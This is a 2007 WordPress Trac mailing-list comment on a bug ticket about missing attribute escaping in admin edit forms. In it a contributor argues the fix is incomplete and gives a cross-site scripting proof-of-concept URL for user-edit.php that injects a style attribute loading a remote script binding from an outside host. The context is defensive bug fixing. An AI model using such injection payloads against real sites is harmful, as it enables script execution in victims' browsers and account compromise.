[wp-trac] Re: [WordPress Trac] #4333: Some attribute_escape()s and
relatives for edit forms
WordPress Trac
wp-trac at lists.automattic.com
Sat May 26 05:29:04 GMT 2007
#4333: Some attribute_escape()s and relatives for edit forms
----------------------------+-----------------------------------------------
Reporter: mdawaffe | Owner: rob1n
Type: defect | Status: reopened
Priority: high | Milestone: 2.2.1
Component: Administration | Version: 2.2
Severity: normal | Resolution:
Keywords: |
----------------------------+-----------------------------------------------
Comment (by g30rg3x):
Well i make some trunk based patches for 2.2.[[BR]]
Obviously i don't add anything that has to be related with the trunk
version.[[BR]]
[[BR]]
Also i think that the trunk solution is incomplete because doesn't filter
the user-edit.php based version of the bug:[[BR]]
user-edit.php?user_id=1&wp_http_referer=%22style=-moz-
binding:url(%22http://ha.ckers.org/xssmoz.xml%23xss%22)'
[[BR]]
--
Ticket URL: <http://trac.wordpress.org/ticket/4333#comment:8>
WordPress Trac <http://trac.wordpress.org/>
WordPress blogging software
More information about the wp-trac
mailing list